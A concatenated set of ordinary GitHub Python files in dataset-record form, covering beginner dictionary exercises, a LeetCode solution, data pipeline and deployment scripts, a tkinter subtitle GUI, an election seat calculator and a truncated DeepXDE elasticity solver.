Change the last_name of the first student from 'Jordan' to 'Bryant'\n# students[0][\"last_name\"] = \"Bryant\"\n# print(students)\n\n\n# 3 In the sports_directory, change 'Messi' to 'Andres'\n# sports_directory[\"soccer\"][0] = \"Andres\"\n# print(sports_directory)\n\n# # 4 Change the value 20 in z to 30\n# z[0][\"y\"] = 30\n# print(z)\n\n\n'''\nCreate a function iterateDictionary(some_list) that, given a list of dictionaries,\nthe function loops through each dictionary in the list and prints each key and the associated value.\nFor example, given the following list: '''\n\nstudents = [\n {'first_name': 'Michael', 'last_name': 'Jordan'},\n {'first_name': 'John', 'last_name': 'Rosales'},\n {'first_name': 'Mark', 'last_name': 'Guillen'},\n {'first_name': 'KB', 'last_name': 'Tonel'}\n]\n# iterateDictionary(students)\n# should output: (it's okay if each key-value pair ends up on 2 separate lines;\n# bonus to get them to appear exactly as below!)\n# first_name - Michael, last_name - Jordan\n# first_name - John, last_name - Rosales\n# first_name - Mark, last_name - Guillen\n# first_name - KB, last_name - Tonel\n\n\n# def iterateDictionary(full_names):\n# for name in full_names:\n# # loop through the list of items that are stored as dictionary items\n# # print(lists)\n# for key in name:\n# # create an inner loop to grab the key for each dictionary item\n# print(f\"{key} - {name[key]}\")\n# # use a formated string to print out the key of the each dictionary item and as well as the value.\n# # print(key)\n# # print(lists[key])\n\n\n''' to get the value of a dictionary item - one way is to write the syntax like this : dict[\"key\"] (will grant u access the value to that specific key)'''\n\n\n# iterateDictionary(students)\n\n\n'''\nGet Values From a List of Dictionaries\nCreate a function iterateDictionary2(key_name, some_list) that, given a list of dictionaries and a key name, \nthe function prints the value stored in that key for each dictionary. \nFor example, iterateDictionary2('first_name', students) should output:\n'''\n\n\n# def iterateDictionary2(key_name, full_names):\n# for name in full_names:\n# # iterates through the list that contains dictionary items\n# for key in name:\n# # iterates through each dictionary item which has 2 key, value pairs fo each item\n# if key_name == key:\n# # do a validation here to check to see if the key_name which is the argument passed in matches a key\n# print(name[key])\n# # else:\n# # print(\"not found\")\n\n\n# iterateDictionary2(\"last_name\", students)\n\n\n'''\nIterate Through a Dictionary with List Values\nCreate a function printInfo(some_dict) that given a dictionary whose values are all lists, \nprints the name of each key along with the size of its list, and then prints the associated values within each key's list. 
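(Hint: len(some_dict[key]) gives each list's size, and a nested loop prints its values.)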
\nFor example:\n'''\n\ndojo = {\n 'locations': ['San Jose', 'Seattle', 'Dallas', 'Chicago', 'Tulsa', 'DC', 'Burbank'],\n 'instructors': ['Michael', 'Amy', 'Eduardo', 'Josh', 'Graham', 'Patrick', 'Minh', 'Devon']\n}\n\n\ndef print_info(coding):\n # for key, value in coding.items():\n # print(key, value)\n for key in coding:\n print(key, len(coding[key]))\n for value in coding[key]:\n print(value)\n # print(coding[key])\n\n # print(dojo[\"locations\"])\n # print(dojo[\"instructors\"])\n # print(dojo[\"instructors\"][0])\n\n\nprint_info(dojo)\n","repo_name":"mkshin1/python_fundamentals","sub_path":"intermediate_functions2.py","file_name":"intermediate_functions2.py","file_ext":"py","file_size_in_byte":4106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"18402593846","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\n\nclass Solution(object):\n def getIntersectionNode(self, headA, headB):\n \"\"\"\n :type head1, head1: ListNode\n :rtype: ListNode\n \"\"\"\n if(not headA or not headB):\n return None\n ptrA, ptrB = headA, headB\n while(ptrA != ptrB):\n ptrA = ptrA.next if(ptrA) else headB\n ptrB = ptrB.next if(ptrB) else headA\n return ptrA\n","repo_name":"Xiderowg/LeetCode","sub_path":"Python/Intersection of Two Linked Lists/Intersection of Two Linked Lists.py","file_name":"Intersection of Two Linked Lists.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"93"} +{"seq_id":"22371479018","text":"import os\nimport json\nfrom shutil import copy2\n\n# Load config.json and correct path variable\nwith open('config.json', 'r') as f:\n config = json.load(f)\n\ningested_record_path = os.path.join(\n config['output_folder_path'],\n \"ingestedfiles.txt\")\nprod_deployment_dir = os.path.join(config['prod_deployment_path'])\nmodel_path = os.path.join(config['output_model_path'], \"trainedmodel.pkl\")\nscore_path = os.path.join(config['output_model_path'], \"latestscore.txt\")\n\n\n# function for deployment\ndef copy_files_to_deployment_dir():\n \"\"\"\n copy the latest pickle file, the latestscore.txt value, and the ingestfiles.txt file into the deployment directory\n \"\"\"\n copy2(ingested_record_path, prod_deployment_dir)\n copy2(model_path, prod_deployment_dir)\n copy2(score_path, prod_deployment_dir)\n\n\nif __name__ == \"__main__\":\n copy_files_to_deployment_dir()\n","repo_name":"ZaidGhazal/Dynamic-Risk-Assessment-System","sub_path":"deployment.py","file_name":"deployment.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"93"} +{"seq_id":"71693150705","text":"\nimport re\nimport boto3\n\nfrom pyspark.sql.types import DateType\nfrom pyspark.sql.functions import udf, year, month\nfrom pyspark.sql.types import *\nfrom datetime import datetime\n\nbucket_name = 'yonglun-udacity-capstone'\ns3_bucket_name = 's3://yonglun-udacity-capstone'\n\nsas_description_filekey = 'raw/I94_SAS_Labels_Descriptions.SAS'\nsas_description_filename = '/tmp/I94_SAS_Labels_Descriptions.SAS'\n\ndef parse_datetime(x):\n try:\n # Try parse yyyy-MM-dd\n return datetime.strptime(x, \"%Y-%m-%d\")\n except:\n try:\n # Try parse dd-MM-yy\n return datetime.strptime(x, \"%d-%m-%y\")\n except:\n return None\nudf_parse_datetime = udf(lambda x: parse_datetime(x), DateType())\n\ndef map_country(city):\n for key, value in 
valid_city.items():\n        if city.lower() == value.lower():\n            return key\nudf_map_country = udf(lambda x : map_country(x), StringType())\n\n#Parse Data Labels\n# S3 client\n# NOTE: access_key and secret_key were referenced here but never defined in this\n# script; reading them from the environment below is an assumed fix, not the\n# original author's code.\nimport os\naccess_key = os.environ.get('AWS_ACCESS_KEY_ID')\nsecret_key = os.environ.get('AWS_SECRET_ACCESS_KEY')\ns3 = boto3.resource('s3',\n                    region_name=\"us-west-2\",\n                    aws_access_key_id=access_key,\n                    aws_secret_access_key=secret_key,\n                    )\n\n# Get Label Descriptions File\ns3.Bucket(bucket_name).download_file(sas_description_filekey, sas_description_filename)\n\nwith open(sas_description_filename) as header_file:\n    lines = header_file.readlines()\n\n    # valid_city: Line 10 to 298\n    # valid_city len: 289\n    city_regex = re.compile(r'([0-9]+)(.*)(\\'.*\\')(\\s\\;)?')\n    valid_city = {}\n    for line in lines[9:298]:\n        match_groups = city_regex.search(line)\n        valid_city[int(match_groups.group(1))] = match_groups.group(3).strip('\\'')\n\nfilepath = '{}/raw/global_temperature/GlobalLandTemperaturesByCity.csv'.format(s3_bucket_name)\n\n# Load\nraw_temp_df = spark.read.format(\"csv\").option(\"header\", \"true\").load(filepath)\n\n# Clean\ncleaned_temp_df = raw_temp_df\\\n    .filter(raw_temp_df.AverageTemperature.isNotNull())\\\n    .filter(raw_temp_df.AverageTemperatureUncertainty.isNotNull())\n\n# Transform\ntransformed_temp_df = cleaned_temp_df\\\n    .select(\"dt\",\n            \"AverageTemperature\",\n            \"AverageTemperatureUncertainty\",\n            \"City\",\n            \"Country\",\n            \"Latitude\",\n            \"Longitude\")\\\n    .withColumn(\"dt\", udf_parse_datetime(\"dt\"))\\\n    .withColumnRenamed(\"AverageTemperature\", \"avg_temp\")\\\n    .withColumnRenamed(\"AverageTemperatureUncertainty\", \"avg_temp_uncertainty\")\\\n    .withColumn(\"city_code\", udf_map_country(\"country\"))\\\n    .withColumnRenamed(\"City\", \"city\")\\\n    .withColumnRenamed(\"Country\", \"country\")\\\n    .withColumnRenamed(\"Latitude\", \"latitude\")\\\n    .withColumnRenamed(\"Longitude\", \"longitude\")\\\n    .withColumnRenamed(\"dt\", \"date_time\")\\\n    .withColumn('month', month('date_time')) \\\n    .withColumn('year', year('date_time'))\n\n# drop rows whose country could not be mapped to a city code (the udf returned null)\ntransformed_temp_df = transformed_temp_df.filter(transformed_temp_df.city_code != 'null')\n\n# Write\ntransformed_temp_df.write\\\n    .partitionBy(\"city_code\", \"year\", \"month\")\\\n    .mode(\"append\")\\\n    .parquet(\"{}/transformed/temperature/\".format(s3_bucket_name))\n\n","repo_name":"cyonglun/udacity-data-engineering-capstone","sub_path":"dags/transform/temperature.py","file_name":"temperature.py","file_ext":"py","file_size_in_byte":3077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"30958120419","text":"import os\r\nimport tkinter as tk\r\n\r\ndef CurSelet():\r\n    if listbox1.get(tk.ANCHOR) == '':\r\n        Label1.config(text = 'Selecciona un video')\r\n    elif v.get() == '':\r\n        Label1.config(text = 'Selecciona un idioma')\r\n    else:\r\n        comandament='py .\\creaSubtitulos.py .\\\\videos\\\\{} {}'.format(listbox1.get(tk.ANCHOR), v.get())\r\n        os.system(comandament)\r\n        Label1.config(text = 'Creando Subtitulos')\r\n\r\n\r\ncontenido = os.listdir('./videos')\r\naux = []\r\nfor i in range(len(contenido)):\r\n    if contenido[i][len(contenido[i])-3:] != 'srt':\r\n        aux.append(contenido[i]) \r\ncontenido = aux\r\nidiomas = ['es-ES', 'ca-ES', 'en-GB', 'en-Us']\r\n\r\n\r\nroot = tk.Tk()\r\namplada = 400\r\nalcada = 400\r\nstrink = '{}x{}'.format(amplada,alcada)\r\nroot.geometry(strink)\r\nroot.attributes('-fullscreen', False)\r\n\r\nc= tk.Canvas(root,bg='blue')\r\nc.place(x=0,y=0,width=amplada,height=alcada)\r\n\r\nlistbox1 = tk.Listbox(c)\r\nlistbox1.place(x = 10, y = 10, width = 190, height = 180)\r\nfor item in contenido:\r\n    
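# fill the listbox with the video filenames gathered above (.srt files were already filtered out)\r\n    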
listbox1.insert(tk.END, item)\r\n\r\nv = tk.StringVar()\r\nr1 = tk.Radiobutton(c, text = \"es-ES\", variable = v, value = idiomas[0], state=tk.ACTIVE)\r\nr1.place(x = 3*amplada//4, y = 10)\r\nr2 = tk.Radiobutton(c, text = \"ca-ES\", variable = v, value = idiomas[1])\r\nr2.place(x = 3*amplada//4, y = 40)\r\nr3 = tk.Radiobutton(c, text = \"en-GB\", variable = v, value = idiomas[2])\r\nr3.place(x = 3*amplada//4, y = 70)\r\nr4 = tk.Radiobutton(c, text = \"en-Us\", variable = v, value = idiomas[3])\r\nr4.place(x = 3*amplada//4, y = 100)\r\n\r\nLabel1 = tk.Label(c, text = '', width = 0, font = ('Arial', 12), bg = c.cget('bg'))\r\nLabel1.place(x = 200, y = 350, anchor =\"center\")\r\n\r\nButton1 = tk.Button(c, text = \"Crea Subtitulo\", command = CurSelet)\r\nButton1.place(x = 200, y = 300, anchor =\"center\")\r\n\r\nroot.mainloop()\r\n\r\n","repo_name":"JavierGarciaCortes/creaSubtitulos","sub_path":"GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"93"} +{"seq_id":"35928355412","text":"from .middleware import get_erp_con\n\n\nclass ERPPartner:\n\n ATTRIBUTES = [\n 'id'\n ]\n\n def __init__(self, vat):\n self.erp_con = get_erp_con()\n self.Partner = self.erp_con.model('res.partner')\n partner_id = self.Partner.search([('vat', '=', \"ES\" + vat)])\n if partner_id:\n for attr, value in self.Partner.read(partner_id[0], self.ATTRIBUTES).items():\n setattr(self, attr, value)\n\n @property\n def address_codes(self):\n if hasattr(self, 'id'):\n city_id = self.Partner.read(\n self.id, ['www_municipi']\n )['www_municipi'][0]\n city = self.erp_con.ResMunicipi.read(city_id, ['ine', 'state'])\n city_code = city['ine']\n state_id = city['state'][0]\n state = self.erp_con.ResCountryState.read(\n state_id, ['code', 'comunitat_autonoma']\n )\n state_code = state['code']\n ccaa_id = state['comunitat_autonoma'][0]\n ccaa = self.erp_con.ResComunitat_autonoma.read(ccaa_id, ['codi'])\n ccaa_code = ccaa['codi']\n return (ccaa_code, state_code, city_code)\n return ()\n","repo_name":"Som-Energia/som-cas","sub_path":"som_cas/contrib.py","file_name":"contrib.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"93"} +{"seq_id":"18752694652","text":"# Elfar Snær Arnarson\r\n# 27 Janúar 2020\r\n# Skilaverkefni 3\r\n\r\nimport pickle\r\n\r\n\r\nclass Nemi:\r\n def __init__(self, kt, nafn, kyn, heimilisfang, simanumer, netfang):\r\n self.kt = kt\r\n self.nafn = nafn\r\n self.kyn = kyn\r\n self.heimilisfang = heimilisfang\r\n self.simanumer = simanumer\r\n self.netfang = netfang\r\n\r\n\r\nclass Grunnskolanemi(Nemi):\r\n def __init__(self, kt, nafn, kyn, heimilisfang, simanumer, netfang, forradarmadur, nafnSkola):\r\n super().__init__(kt, nafn, kyn, heimilisfang, simanumer, netfang)\r\n self.forradarmadur = forradarmadur\r\n self.nafnSkola = nafnSkola\r\n\r\n\r\nclass Framhaldsskolanemi(Nemi):\r\n def __init__(self, kt, nafn, kyn, heimilisfang, simanumer, netfang, brautarheiti, busetustyrk):\r\n super().__init__(kt, nafn, kyn, heimilisfang, simanumer, netfang)\r\n self.brautarheiti = brautarheiti\r\n self.busetustyrk = busetustyrk\r\n\r\n\r\n\r\nclass Haskolanemi(Nemi):\r\n def __init__(self, kt, nafn, kyn, heimilisfang, simanumer, netfang, stigNams, namslan):\r\n super().__init__(kt, nafn, kyn, heimilisfang, simanumer, netfang)\r\n self.stigNams = stigNams\r\n self.namslan = namslan\r\n\r\n\r\nnemendalisti = []\r\n# 
skraningnemenda = nemar.SkraningNemenda()\r\n#óklárað\r\nchoice = \"0\"\r\nwhile choice != \"7\":\r\n print(\"1. Opna nemaskrá\")\r\n print(\"2. Skrá grunnskólanema.\")\r\n print(\"3. Skrá framhaldsskólkanema.\")\r\n print(\"4. Skrá Háskólanema.\")\r\n print(\"5. Vista nemaskrá\")\r\n print(\"6. Prenta nemendalista\")\r\n print(\"7. Hætta\")\r\n\r\n choice = str(input(\"Sláðu inn val: \"))\r\n if choice == \"1\":\r\n with open('nema_listi', 'rb') as file:\r\n nemendalisti = pickle.load(file)\r\n elif choice == \"2\":\r\n grunnskolanemi = Grunnskolanemi('2905992379', 'Jón Arnar Árnason', 'kk', 'Svarthamar 26', '58712345',\r\n 'jonarnar@gmail.com', 'Árni Árnason', 'Borgarskóli')\r\n nemendalisti.append(grunnskolanemi)\r\n elif choice == \"3\":\r\n framhaldsskolanemi = Framhaldsskolanemi('2815005485', 'Arnar Sigurðsson', 'kk', 'Logafold 13'\r\n , '5874584', 'arnarsig@gmail.com', 'Tölvubraut', 'Nei')\r\n nemendalisti.append(framhaldsskolanemi)\r\n elif choice == \"4\":\r\n haskolanemi = Haskolanemi('2504884828', 'Snæbjörn Fjarðarsson', 'kk', \"Dúfnahóll 14\"\r\n , '8485784', \"snaebjorn12@gmail.com\", 'PHd', 'Já')\r\n nemendalisti.append(haskolanemi)\r\n elif choice == \"5\":\r\n with open(\"nema_listi\", 'wb') as file:\r\n pickle.dump(nemendalisti, file)\r\n elif choice == \"6\":\r\n #óklárað\r\n print(nemendalisti)\r\n","repo_name":"PanamaP/pythonDump","sub_path":"Skilaverkefni 3/Nemar.py","file_name":"Nemar.py","file_ext":"py","file_size_in_byte":2747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"17340336970","text":"from dao_malopolska_area import DAOMalopolskaArea\n\n\nclass ModelRoot():\n\n def __init__(self):\n self.malopolska_area_container = DAOMalopolskaArea().extract_imported_data()\n\n def get_malopolska_area_container(self):\n return self.malopolska_area_container\n\n def get_menu_options(self):\n self.menu_options = [\"(1) List statistics\",\n \"(2) Display 3 cities with longest names\",\n \"(3) Display county's name with the largest number of communities\",\n \"(4) Display locations, that belong to more than one category\",\n \"(5) Advanced search\",\n \"(6) Show all areas\",\n \"(0) Exit program\"]\n return self.menu_options\n","repo_name":"LMalko/Know-Your-neighbouhood","sub_path":"model_root.py","file_name":"model_root.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"44351003498","text":"#!/usr/bin/env python3\n\nimport sys\nimport csv\nimport urllib.request\nimport json\n\nCITY = 'שם ישוב'\nELLIGIBLE = 'בזב'\nTOTAL_VOTES = 'מצביעים'\nINVALID_VOTES = 'פסולים'\nVALID_VOTES = 'כשרים'\n\nADDITIONAL_BALLOTS = 'מעטפות חיצוניות'\n\nEXPC_FIELDNAMES = [\n 'סמל ועדה',\n CITY,\n 'סמל ישוב',\n ELLIGIBLE,\n TOTAL_VOTES,\n INVALID_VOTES,\n VALID_VOTES,\n]\n\n\ndef parse_parties(fieldnames):\n i = len(EXPC_FIELDNAMES)\n assert fieldnames[:i] == EXPC_FIELDNAMES\n # rows may contain a trailing comma\n parties = fieldnames[i:]\n if parties[-1] == '':\n parties = parties[:-1]\n return parties\n\n\n# expc.csv\ndef parse_expc(filename, encoding):\n votes_per_city = {}\n turnout_per_city = {}\n with open(filename, newline='', encoding=encoding) as csvfile:\n reader = csv.DictReader(csvfile)\n parties = parse_parties(reader.fieldnames)\n for row in reader:\n city = row[CITY]\n assert city not in votes_per_city\n elligible = int(row[ELLIGIBLE])\n total_votes = int(row[TOTAL_VOTES])\n valid_votes = int(row[VALID_VOTES])\n 
invalid_votes = int(row[INVALID_VOTES])\n assert elligible >= 0\n assert total_votes >= 0\n assert valid_votes >= 0\n assert invalid_votes >= 0\n assert total_votes == valid_votes + invalid_votes, \\\n f\"numbers don't add up correctly in {city}\"\n votes_per_party = {}\n for party in parties:\n votes = int(row[party])\n assert votes >= 0\n votes_per_party[party] = votes\n assert sum(votes_per_party.values()) == valid_votes, \\\n f\"numbers don't add up correctly in {city}\"\n votes_per_city[city] = votes_per_party\n if elligible != 0:\n if total_votes > elligible:\n print(f\"voter turnout > 100% in {city}\")\n print(\"\\t\" f\"elligible voters: {elligible}\")\n print(\"\\t\" f\"total votes: {total_votes}\")\n turnout = total_votes / elligible\n turnout_per_city[city] = turnout\n else:\n # for some reason, this field is zero\n assert city == ADDITIONAL_BALLOTS\n return parties, votes_per_city, turnout_per_city\n\n\ndef parse_alliances(filename, encoding):\n with open(filename, 'r', encoding=encoding) as f:\n lines = f.readlines()\n alliances = []\n for line in lines:\n line = line.strip()\n if line != '':\n words = line.split()\n assert len(words) == 2\n assert words[0] != words[1]\n assert all(words[0] not in a for a in alliances)\n assert all(words[1] not in a for a in alliances)\n alliances.append(tuple(words))\n return alliances\n\n\ndef get_party_votes(votes_per_city, party):\n return sum(votes_per_party[party] for votes_per_party in votes_per_city.values())\n\n\nELECTORAL_THRESHOLD_PERCENTAGE = 3.25\nNUMBER_OF_SEATS = 120\n# see https://main.knesset.gov.il/About/Lexicon/Pages/seats.aspx\ndef calculate_seats(votes_per_party, alliances):\n parties = list(votes_per_party.keys())\n total_votes = sum(votes_per_party.values()) # A\n electoral_threshold = total_votes * (ELECTORAL_THRESHOLD_PERCENTAGE / 100.) 
# B\n is_failed_party = lambda party: votes_per_party[party] < electoral_threshold\n failed_parties = [party for party in parties if is_failed_party(party)]\n # discard failed parties that didn't pass the electoral threshold\n votes_per_party = {party : votes for party, votes in votes_per_party.items() if party not in failed_parties} # F\n total_votes = sum(votes_per_party.values()) # D\n votes_per_seat = total_votes // NUMBER_OF_SEATS # E\n seats_per_party = {party : votes // votes_per_seat for party, votes in votes_per_party.items()} # G\n remaining_seats = NUMBER_OF_SEATS - sum(seats_per_party.values()) # H\n # discard electoral alliances with parties that didn't pass the threshold\n is_failed_alliance = lambda alliance: any(party in failed_parties for party in alliance)\n alliances = [alliance for alliance in alliances if not is_failed_alliance(alliance)]\n is_in_alliance = lambda party: any(party in alliance for alliance in alliances)\n seats_distribution = {party : seats for party, seats in seats_per_party.items() if not is_in_alliance(party)}\n seats_distribution.update({alliance : sum(seats_per_party[party] for party in alliance) for alliance in alliances})\n votes_distribution = {party : votes for party, votes in votes_per_party.items() if not is_in_alliance(party)}\n votes_distribution.update({alliance : sum(votes_per_party[party] for party in alliance) for alliance in alliances})\n parties_and_alliances = list(seats_distribution.keys())\n # split the remaining seats among the parties (and electoral alliances)\n while remaining_seats > 0:\n # parties that got half of the number of seats but less than half of the total votes, cannot get more seats\n is_invalid_party = lambda party: seats_distribution[party] >= NUMBER_OF_SEATS // 2 and votes_distribution[party] < total_votes // 2\n measure_per_party = {party : votes_distribution[party] / (seats_distribution[party] + 1) for party in parties_and_alliances if not is_invalid_party(party)} # I\n chosen_party = max(measure_per_party, key=measure_per_party.get)\n seats_distribution[chosen_party] += 1\n remaining_seats -= 1\n # calculate seats distribution for parties which aren't in any electoral alliance\n seats_per_party = {party : seats for party, seats in seats_distribution.items() if not party in alliances}\n # split the seats among the parties in each electoral alliance\n for alliance in alliances:\n shared_seats = seats_distribution[alliance] # J\n shared_measure = votes_distribution[alliance] // shared_seats # K\n individual_seats = {party : votes_per_party[party] // shared_measure for party in alliance} # L\n remaining_seats = shared_seats - sum(individual_seats.values())\n # split the remaining seats among the individual parties in the electoral alliance\n while remaining_seats > 0:\n # parties that got half of the number of seats but less than half of the total votes, cannot get more seats\n is_invalid_party = lambda party: individual_seats[party] >= NUMBER_OF_SEATS // 2 and votes_per_party[party] < total_votes // 2\n individual_measure = {party : votes_per_party[party] / (individual_seats[party] + 1) for party in alliance if not is_invalid_party(party)} # M\n chosen_party = max(individual_measure, key=individual_measure.get)\n individual_seats[chosen_party] += 1\n remaining_seats -= 1\n # update seats distribution for parties in the electoral alliance\n seats_per_party.update(individual_seats)\n # finally, parties that didn't pass the electoral threshold get zero seats\n for party in failed_parties:\n seats_per_party[party] = 
0\n return seats_per_party\n\n\nEXPC_CSV_URL = \"https://media{N}.bechirot.gov.il/files/expc.csv\"\nENCODING = \"utf-8-sig\" # utf-8 with BOM\n\ndef main(argv):\n assert len(argv) == 4, \\\n f\"Usage: {argv[0]} \"\n\n expc_csv_filename, _ = urllib.request.urlretrieve(EXPC_CSV_URL.format(N=argv[1]))\n alliances_filename = argv[2]\n parties, votes_per_city, turnout_per_city = parse_expc(expc_csv_filename, ENCODING)\n electoral_alliances = parse_alliances(alliances_filename, 'utf-8')\n votes_per_party = {party : get_party_votes(votes_per_city, party) for party in parties}\n seats_per_party = calculate_seats(votes_per_party, electoral_alliances)\n results_filename = argv[3]\n with open(results_filename, 'w', encoding='utf-8') as f:\n json.dump(seats_per_party, f, ensure_ascii=False)\n\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","repo_name":"royeldar/elections","sub_path":"elections.py","file_name":"elections.py","file_ext":"py","file_size_in_byte":8032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"148780934","text":"import os, logging, logging.config\nfrom discord.ext.commands import Bot\nfrom utils import files\nfrom config import options, PRIVATE, testers_id\nfrom dotenv import load_dotenv\nfrom commands.ext.games import GameManager\n\nbot = Bot(**options())\n\n\ndef load_extensions(system):\n for file in files.get_py_files(system):\n bot.load_extension('{}.{}'.format(system.replace('/', '.'), file))\n\n\nif __name__ == \"__main__\":\n load_dotenv()\n\n logging.config.fileConfig('logs/config.cfg')\n\n bot.add_cog(GameManager(bot))\n load_extensions('commands')\n bot.load_extension('commands.exchange.command')\n bot.load_extension('commands.tictactoe.command')\n bot.load_extension('commands.hangman.command')\n bot.load_extension('commands.minesweeper.command')\n \n load_extensions('events')\n bot.load_extension('events.chat.event')\n\n\n@bot.event\nasync def on_message(message):\n if message.author == bot.user or message.author.bot:\n return\n if PRIVATE:\n if not message.author.id in testers_id:\n return\n await bot.process_commands(message)\n\n\nbot.run(os.getenv('DISCORD_TOKEN'))","repo_name":"gambarov/discord-patron-bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"73387604787","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nSolves the quarter Lame problem.\n\n * * * * * *\n * *\n * *\n * * \n * * \n * * \n * * \n y * *\n |__x * * * * * * **\n -------| --> R_i\n ---------------------| -->R_o \n \nDirichlet BCs:\n\nu_x(x=0,y) = 0\nu_y(x,y=0) = 0\n\nwhere u_x represents the displacement in x direction, while u_y represents the displacement in y direction. \n\nNeumann boundary conditions (in polar coordinates)\nP(r=R_i,\\theta) = 1 \n\nIn this problem set the material properties as follows:\n - lame : 1153.846\n - shear: 769.23\n\nwhich will lead Young's modulus: 2000 and Poisson's coeff: 0.3. In this example, the Dirichlet boundary conditions are enforced hardly by choosing a surrogate model as follows:\n\nu_s = u_x*x\nv_s = u_y*y\n\nwhere u_x and u_y are the network predictions. 
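Multiplying by x makes u_s vanish on the symmetry plane x = 0, and multiplying by y makes v_s vanish on y = 0, so both Dirichlet conditions hold exactly by construction and need no loss-term penalty.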
\n\n\nThe problem definition and analytical solution:\nhttps://par.nsf.gov/servlets/purl/10100420\n\n@author: tsahin\n\"\"\"\nimport deepxde as dde\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport matplotlib.tri as tri\nfrom deepxde.backend import tf\nfrom pyevtk.hl import unstructuredGridToVTK\n\nfrom utils.elasticity.elasticity_utils import stress_plane_stress, momentum_2d_plane_stress, problem_parameters, zero_neumman_plane_stress_x, zero_neumman_plane_stress_y, stress_to_traction_2d\nfrom utils.geometry.geometry_utils import calculate_boundary_normals, polar_transformation_2d\nfrom utils.elasticity import elasticity_utils\n\n# change global variables in elasticity_utils\nelasticity_utils.lame = 1153.846\nelasticity_utils.shear = 769.23\n\n# geometrical parameters\nradius_inner = 1\ncenter_inner = [0,0]\nradius_outer = 2\ncenter_outer = [0,0]\n\n# First create two cylinders and subtract the small one from the large one. Then create a rectangle and intersect it with the region which is left.\ngeom_disk_1 = dde.geometry.Disk(center_inner, radius_inner)\ngeom_disk_2 = dde.geometry.Disk(center_outer, radius_outer)\ngeom_disk = dde.geometry.csg.CSGDifference(geom1=geom_disk_2, geom2=geom_disk_1)\ngeom_rect = dde.geometry.Rectangle(xmin=[0, 0], xmax=[2, 2])\n\ngeom = dde.geometry.csg.CSGIntersection(geom1=geom_disk, geom2=geom_rect)\nelasticity_utils.geom = geom\n\n# Inner pressure\npressure_inlet = 1\n\ndef pressure_inner_x(x, y, X):\n \n sigma_xx, sigma_yy, sigma_xy = stress_plane_stress(x,y)\n \n normals, cond = calculate_boundary_normals(X,geom)\n Tx, _, _, _ = stress_to_traction_2d(sigma_xx, sigma_yy, sigma_xy, normals, cond)\n\n return Tx + pressure_inlet*normals[:,0:1]\n\ndef pressure_inner_y(x, y, X):\n\n sigma_xx, sigma_yy, sigma_xy = stress_plane_stress(x,y)\n \n normals, cond = calculate_boundary_normals(X,geom)\n _, Ty, _, _ = stress_to_traction_2d(sigma_xx, sigma_yy, sigma_xy, normals, cond)\n\n return Ty + pressure_inlet*normals[:,1:2]\n\n\ndef boundary_outer(x, on_boundary):\n return on_boundary and np.isclose(np.linalg.norm(x - center_outer, axis=-1), radius_outer)\n\ndef boundary_inner(x, on_boundary):\n return on_boundary and np.isclose(np.linalg.norm(x - center_inner, axis=-1), radius_inner)\n\ndef boundary_left(x, on_boundary):\n return on_boundary and np.isclose(x[0],0)\n\ndef boundary_bottom(x, on_boundary):\n return on_boundary and np.isclose(x[1],0)\n\nsoft_dirichlet = True # enforce the Dirichlet BC softly\n\nbc1 = dde.OperatorBC(geom, pressure_inner_x, boundary_inner)\nbc2 = dde.OperatorBC(geom, pressure_inner_y, boundary_inner)\nif soft_dirichlet:\n bc3 = dde.DirichletBC(geom, lambda _: 0.0, boundary_left, component=0)\n bc4 = dde.DirichletBC(geom, lambda _: 0.0, boundary_bottom, component=1)\nbc5 = dde.OperatorBC(geom, zero_neumman_plane_stress_x, boundary_outer)\nbc6 = dde.OperatorBC(geom, zero_neumman_plane_stress_y, boundary_outer)\nbc7 = dde.OperatorBC(geom, zero_neumman_plane_stress_x, boundary_bottom)\nbc8 = dde.OperatorBC(geom, zero_neumman_plane_stress_y, boundary_left)\n\ndata = dde.data.PDE(\n geom,\n momentum_2d_plane_stress,\n [bc1, bc2, bc3, bc4, bc5, bc6, bc7, bc8], # remove bc3 and bc4, if you want to enforce Dirichlet BC hardly\n num_domain=1500,\n num_boundary=500,\n num_test=500,\n train_distribution = \"Sobol\"\n)\n\ndef output_transform_hard(x, y):\n \"\"\"\n Enforces the Dirichlet BCs in a hard way.\n\n u_x = u_x * x\n u_y = u_y * y\n \"\"\"\n u = y[:, 0:1]\n v = y[:, 1:2]\n return tf.concat([ u*x, v*y], axis=1)\n\ndef 
